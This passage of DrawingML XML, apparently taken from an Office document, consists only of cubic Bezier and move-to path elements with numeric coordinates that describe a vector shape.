                  <a:cubicBezTo>
                    <a:pt x="283" y="296"/>
                    <a:pt x="283" y="296"/>
                    <a:pt x="283" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="297"/>
                    <a:pt x="282" y="297"/>
                    <a:pt x="282" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="300"/>
                    <a:pt x="282" y="300"/>
                    <a:pt x="282" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="303"/>
                    <a:pt x="285" y="303"/>
                    <a:pt x="285" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="306"/>
                    <a:pt x="285" y="306"/>
                    <a:pt x="285" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="306"/>
                    <a:pt x="285" y="306"/>
                    <a:pt x="285" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="308"/>
                    <a:pt x="284" y="309"/>
                    <a:pt x="285" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="311"/>
                    <a:pt x="288" y="310"/>
                    <a:pt x="289" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="312"/>
                    <a:pt x="290" y="312"/>
                    <a:pt x="290" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="313"/>
                    <a:pt x="294" y="311"/>
                    <a:pt x="295" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="311"/>
                    <a:pt x="296" y="311"/>
                    <a:pt x="296" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="312"/>
                    <a:pt x="296" y="312"/>
                    <a:pt x="297" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="297" y="313"/>
                    <a:pt x="298" y="312"/>
                    <a:pt x="299" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299" y="312"/>
                    <a:pt x="299" y="313"/>
                    <a:pt x="300" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="314"/>
                    <a:pt x="300" y="314"/>
                    <a:pt x="300" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="314"/>
                    <a:pt x="301" y="314"/>
                    <a:pt x="302" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="314"/>
                    <a:pt x="303" y="314"/>
                    <a:pt x="303" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="314"/>
                    <a:pt x="303" y="314"/>
                    <a:pt x="303" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="313"/>
                    <a:pt x="303" y="313"/>
                    <a:pt x="303" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="312"/>
                    <a:pt x="303" y="312"/>
                    <a:pt x="305" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="310"/>
                    <a:pt x="306" y="309"/>
                    <a:pt x="305" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="308"/>
                    <a:pt x="305" y="308"/>
                    <a:pt x="305" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="305"/>
                    <a:pt x="307" y="305"/>
                    <a:pt x="307" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="305"/>
                    <a:pt x="307" y="305"/>
                    <a:pt x="308" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309" y="302"/>
                    <a:pt x="309" y="302"/>
                    <a:pt x="310" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="301"/>
                    <a:pt x="310" y="300"/>
                    <a:pt x="310" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="299"/>
                    <a:pt x="314" y="297"/>
                    <a:pt x="314" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="296"/>
                    <a:pt x="313" y="296"/>
                    <a:pt x="311" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="295"/>
                    <a:pt x="311" y="295"/>
                    <a:pt x="311" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="294"/>
                    <a:pt x="311" y="294"/>
                    <a:pt x="312" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="292"/>
                    <a:pt x="311" y="291"/>
                    <a:pt x="311" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="289"/>
                    <a:pt x="311" y="288"/>
                    <a:pt x="311" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="286"/>
                    <a:pt x="313" y="286"/>
                    <a:pt x="314" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="284"/>
                    <a:pt x="314" y="284"/>
                    <a:pt x="317" y="283"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="253" y="313"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="312"/>
                    <a:pt x="253" y="311"/>
                    <a:pt x="253" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="310"/>
                    <a:pt x="253" y="310"/>
                    <a:pt x="253" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="309"/>
                    <a:pt x="252" y="309"/>
                    <a:pt x="252" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="309"/>
                    <a:pt x="252" y="309"/>
                    <a:pt x="251" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="309"/>
                    <a:pt x="249" y="307"/>
                    <a:pt x="249" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="306"/>
                    <a:pt x="250" y="305"/>
                    <a:pt x="249" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="304"/>
                    <a:pt x="249" y="304"/>
                    <a:pt x="248" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="305"/>
                    <a:pt x="247" y="306"/>
                    <a:pt x="247" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="307"/>
                    <a:pt x="250" y="310"/>
                    <a:pt x="251" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="311"/>
                    <a:pt x="252" y="311"/>
                    <a:pt x="252" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="313"/>
                    <a:pt x="253" y="313"/>
                    <a:pt x="253" y="313"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="242" y="297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="245" y="300"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="299"/>
                    <a:pt x="245" y="299"/>
                    <a:pt x="245" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="299"/>
                    <a:pt x="245" y="298"/>
                    <a:pt x="245" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="298"/>
                    <a:pt x="244" y="298"/>
                    <a:pt x="244" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="297"/>
                    <a:pt x="244" y="297"/>
                    <a:pt x="244" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="296"/>
                    <a:pt x="243" y="296"/>
                    <a:pt x="243" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="296"/>
                    <a:pt x="242" y="296"/>
                    <a:pt x="242" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="296"/>
                    <a:pt x="242" y="296"/>
                    <a:pt x="242" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="297"/>
                    <a:pt x="242" y="297"/>
                    <a:pt x="243" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="299"/>
                    <a:pt x="244" y="299"/>
                    <a:pt x="244" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="299"/>
                    <a:pt x="245" y="299"/>
                    <a:pt x="245" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="300"/>
                    <a:pt x="245" y="300"/>
                    <a:pt x="245" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="301"/>
                    <a:pt x="245" y="301"/>
                    <a:pt x="245" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="300"/>
                    <a:pt x="245" y="300"/>
                    <a:pt x="245" y="300"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="240" y="294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="293"/>
                    <a:pt x="241" y="293"/>
                    <a:pt x="241" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="293"/>
                    <a:pt x="240" y="293"/>
                    <a:pt x="239" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="292"/>
                    <a:pt x="239" y="292"/>
                    <a:pt x="239" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="291"/>
                    <a:pt x="239" y="291"/>
                    <a:pt x="239" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="291"/>
                    <a:pt x="238" y="291"/>
                    <a:pt x="238" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="292"/>
                    <a:pt x="238" y="292"/>
                    <a:pt x="238" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="292"/>
                    <a:pt x="239" y="292"/>
                    <a:pt x="239" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="292"/>
                    <a:pt x="239" y="292"/>
                    <a:pt x="239" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="293"/>
                    <a:pt x="239" y="293"/>
                    <a:pt x="239" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="293"/>
                    <a:pt x="239" y="293"/>
                    <a:pt x="239" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="293"/>
                    <a:pt x="239" y="293"/>
                    <a:pt x="239" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="293"/>
                    <a:pt x="239" y="293"/>
                    <a:pt x="239" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                    <a:pt x="240" y="294"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="275" y="311"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="311"/>
                    <a:pt x="274" y="309"/>
                    <a:pt x="273" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="272" y="309"/>
                    <a:pt x="272" y="309"/>
                    <a:pt x="273" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="307"/>
                    <a:pt x="273" y="307"/>
                    <a:pt x="273" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="307"/>
                    <a:pt x="270" y="304"/>
                    <a:pt x="269" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="308"/>
                    <a:pt x="267" y="308"/>
                    <a:pt x="267" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267" y="306"/>
                    <a:pt x="268" y="305"/>
                    <a:pt x="266" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="304"/>
                    <a:pt x="266" y="304"/>
                    <a:pt x="266" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="304"/>
                    <a:pt x="264" y="304"/>
                    <a:pt x="264" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="304"/>
                    <a:pt x="262" y="303"/>
                    <a:pt x="262" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262" y="301"/>
                    <a:pt x="262" y="300"/>
                    <a:pt x="262" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="299"/>
                    <a:pt x="259" y="299"/>
                    <a:pt x="258" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="296"/>
                    <a:pt x="258" y="295"/>
                    <a:pt x="257" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="294"/>
                    <a:pt x="256" y="294"/>
                    <a:pt x="256" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="294"/>
                    <a:pt x="255" y="294"/>
                    <a:pt x="255" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254" y="294"/>
                    <a:pt x="254" y="294"/>
                    <a:pt x="252" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="292"/>
                    <a:pt x="252" y="292"/>
                    <a:pt x="252" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="291"/>
                    <a:pt x="250" y="290"/>
                    <a:pt x="249" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="287"/>
                    <a:pt x="247" y="287"/>
                    <a:pt x="247" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="287"/>
                    <a:pt x="246" y="287"/>
                    <a:pt x="246" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="287"/>
                    <a:pt x="246" y="286"/>
                    <a:pt x="246" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="285"/>
                    <a:pt x="244" y="285"/>
                    <a:pt x="243" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="283"/>
                    <a:pt x="241" y="284"/>
                    <a:pt x="240" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="283"/>
                    <a:pt x="238" y="282"/>
                    <a:pt x="236" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="282"/>
                    <a:pt x="236" y="283"/>
                    <a:pt x="238" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="287"/>
                    <a:pt x="241" y="287"/>
                    <a:pt x="242" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="290"/>
                    <a:pt x="243" y="290"/>
                    <a:pt x="243" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="293"/>
                    <a:pt x="244" y="293"/>
                    <a:pt x="245" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="293"/>
                    <a:pt x="246" y="294"/>
                    <a:pt x="247" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="295"/>
                    <a:pt x="247" y="295"/>
                    <a:pt x="247" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="298"/>
                    <a:pt x="247" y="298"/>
                    <a:pt x="247" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="300"/>
                    <a:pt x="251" y="301"/>
                    <a:pt x="252" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="304"/>
                    <a:pt x="254" y="305"/>
                    <a:pt x="254" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="307"/>
                    <a:pt x="255" y="308"/>
                    <a:pt x="255" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="312"/>
                    <a:pt x="259" y="313"/>
                    <a:pt x="260" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262" y="317"/>
                    <a:pt x="262" y="317"/>
                    <a:pt x="262" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="319"/>
                    <a:pt x="264" y="319"/>
                    <a:pt x="265" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="319"/>
                    <a:pt x="269" y="319"/>
                    <a:pt x="269" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="270" y="318"/>
                    <a:pt x="270" y="318"/>
                    <a:pt x="270" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="270" y="317"/>
                    <a:pt x="270" y="317"/>
                    <a:pt x="270" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="316"/>
                    <a:pt x="271" y="316"/>
                    <a:pt x="271" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="313"/>
                    <a:pt x="271" y="313"/>
                    <a:pt x="271" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="311"/>
                    <a:pt x="274" y="312"/>
                    <a:pt x="275" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="311"/>
                    <a:pt x="275" y="311"/>
                    <a:pt x="275" y="311"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="340" y="276"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="275"/>
                    <a:pt x="341" y="275"/>
                    <a:pt x="341" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="273"/>
                    <a:pt x="340" y="273"/>
                    <a:pt x="340" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="272"/>
                    <a:pt x="340" y="270"/>
                    <a:pt x="341" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="267"/>
                    <a:pt x="340" y="266"/>
                    <a:pt x="339" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339" y="265"/>
                    <a:pt x="339" y="266"/>
                    <a:pt x="338" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="267"/>
                    <a:pt x="338" y="267"/>
                    <a:pt x="338" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="268"/>
                    <a:pt x="337" y="269"/>
                    <a:pt x="336" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="268"/>
                    <a:pt x="335" y="269"/>
                    <a:pt x="334" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="271"/>
                    <a:pt x="334" y="271"/>
                    <a:pt x="332" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="271"/>
                    <a:pt x="332" y="270"/>
                    <a:pt x="332" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="270"/>
                    <a:pt x="330" y="270"/>
                    <a:pt x="330" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="271"/>
                    <a:pt x="330" y="271"/>
                    <a:pt x="330" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="271"/>
                    <a:pt x="329" y="271"/>
                    <a:pt x="328" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="271"/>
                    <a:pt x="326" y="273"/>
                    <a:pt x="326" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="274"/>
                    <a:pt x="326" y="276"/>
                    <a:pt x="326" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="278"/>
                    <a:pt x="327" y="278"/>
                    <a:pt x="327" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="277"/>
                    <a:pt x="327" y="277"/>
                    <a:pt x="327" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="276"/>
                    <a:pt x="327" y="276"/>
                    <a:pt x="327" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="275"/>
                    <a:pt x="327" y="275"/>
                    <a:pt x="327" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="275"/>
                    <a:pt x="327" y="275"/>
                    <a:pt x="327" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="274"/>
                    <a:pt x="329" y="274"/>
                    <a:pt x="329" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="274"/>
                    <a:pt x="329" y="274"/>
                    <a:pt x="332" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="274"/>
                    <a:pt x="332" y="275"/>
                    <a:pt x="332" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="277"/>
                    <a:pt x="332" y="277"/>
                    <a:pt x="332" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="278"/>
                    <a:pt x="333" y="278"/>
                    <a:pt x="333" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="278"/>
                    <a:pt x="334" y="278"/>
                    <a:pt x="334" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="278"/>
                    <a:pt x="334" y="278"/>
                    <a:pt x="335" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="279"/>
                    <a:pt x="335" y="279"/>
                    <a:pt x="336" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="279"/>
                    <a:pt x="336" y="279"/>
                    <a:pt x="336" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="280"/>
                    <a:pt x="336" y="280"/>
                    <a:pt x="336" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="280"/>
                    <a:pt x="337" y="280"/>
                    <a:pt x="337" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="281"/>
                    <a:pt x="337" y="281"/>
                    <a:pt x="337" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="281"/>
                    <a:pt x="338" y="281"/>
                    <a:pt x="338" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="280"/>
                    <a:pt x="338" y="280"/>
                    <a:pt x="338" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="278"/>
                    <a:pt x="338" y="278"/>
                    <a:pt x="338" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="278"/>
                    <a:pt x="338" y="278"/>
                    <a:pt x="337" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="275"/>
                    <a:pt x="338" y="275"/>
                    <a:pt x="338" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="275"/>
                    <a:pt x="338" y="275"/>
                    <a:pt x="339" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339" y="275"/>
                    <a:pt x="339" y="276"/>
                    <a:pt x="340" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="276"/>
                    <a:pt x="340" y="276"/>
                    <a:pt x="340" y="276"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="333" y="267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="266"/>
                    <a:pt x="333" y="265"/>
                    <a:pt x="333" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="264"/>
                    <a:pt x="333" y="263"/>
                    <a:pt x="332" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="263"/>
                    <a:pt x="331" y="263"/>
                    <a:pt x="331" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="262"/>
                    <a:pt x="331" y="261"/>
                    <a:pt x="331" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="260"/>
                    <a:pt x="330" y="260"/>
                    <a:pt x="329" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="260"/>
                    <a:pt x="329" y="260"/>
                    <a:pt x="329" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="259"/>
                    <a:pt x="328" y="259"/>
                    <a:pt x="328" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="258"/>
                    <a:pt x="328" y="258"/>
                    <a:pt x="328" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="256"/>
                    <a:pt x="328" y="256"/>
                    <a:pt x="327" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="254"/>
                    <a:pt x="326" y="254"/>
                    <a:pt x="325" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="253"/>
                    <a:pt x="325" y="253"/>
                    <a:pt x="324" y="252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="252"/>
                    <a:pt x="324" y="252"/>
                    <a:pt x="324" y="252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="252"/>
